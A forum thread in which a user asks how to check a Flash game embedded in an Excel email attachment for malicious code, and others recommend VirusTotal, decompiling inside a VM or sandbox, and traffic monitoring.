Jump to content

How To Identify Malicious Code In Flash Objects?


Recommended Posts

So the other day my mom forwarded me a chain email with an Excel attachment, saying it's a game. I opened it without giving it much thought and found out it was a flash game embedded inside. Because I can't think of a good reason for anyone to put flash in Excel, I got suspicious of it and discovered that this is a known method of trojan attack.

Now, this exploit was discovered patched years ago and I'm pretty sure my Excel 2010 with the latest updates handled it safely. The question is, how do I find out if there was malicious code in that file to begin with? What tools can I use to prove my suspicions?

Link to comment
Share on other sites

Upload it to virus total.

I've never had much luck on Virustotal with SWF files. EXE's, yes, but SWF files seem to get no hits on anything. Most virus scanners will ignore malicious SWF files all together unless there are specific signatures for some major threat, or have a payload in plain text. SWF files generally need to be decompiled first before being able to examine what is in them.

@Lupius, If you want to look through them yourself though, best to do so in a VM or sandbox of some sort where you don't care about what happens tot he system, either by 1 - decompiling in a VM(ala HP SWF Scanner, or SoFlash's Decompiler, SoFlash uses Active-X and will execute the payload, so do in a VM or Sandbox) or 2, run it against a clean VM snapshot, and compare changes made to the system itself afterwards, monitor new traffic it created with something like Wireshark, etc.

There is also http://www.flashprobe.com/ and CWSandbox (I think its now GFI Malware something or other though).

Some more info on this sort of attack:



Edited by digip
Link to comment
Share on other sites

Finding out if a file is malicious or not, its the hardest part. You can't tell if the file is infected or not just by looking at it.

Ways to tell, is by uploading it to virus total as suggested by Sparda

Or install a good AV such as Avast, for instance it will alert you and delete the file if it finds to be infected.

Link to comment
Share on other sites

Not that you shouldn't check the file for viruses to be safe, but I wouldn't be too worried.

You said you couldn't find a legitimate reason a game was imbeded in the excel file. That's the easy part.

I just recently worked on the helpdesk at a manufacturing plant for one of the major car companies. People would hide games in the excel files to get away with being able to play them. Since the websites that host the games are blocked they would have to have a local copy. Noone would expect the excel files unless they were named something conspicuous.

However, that's not to say it definatly isn't malicious, rather an explination as to why it exists

Link to comment
Share on other sites

Personally, I wouldn't trust any SWF file, embedded in an excel file. Easiest way to know, ask the sender if they even sent you the file. No matter who its from, make sure they are the one who sent you an attachment, and even then, ask them where they got it.

Its a know trick for getting past filters in corporate networks, and its also how RSI got hacked last year, so do your homework before running ANYTHING.

Link to comment
Share on other sites

! agree Sandbox or even a VM will do the job, of preventing the infection from spreading to your computer. That's the best way, to contain the infection or prevent it from spreading to your main system altogether.

Link to comment
Share on other sites

Thanks for all the replies!

I did set up a VM and extracted the flash file in it. Decompiled it with Flash Decompiler Trillix and couldn't find anything foul with the scripts in the file (it was all written in Portuguese anyway).

I guess the moral of the story is, I'm glad I finally came up with a scare story that will stop my mom from forwarding chain emails.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...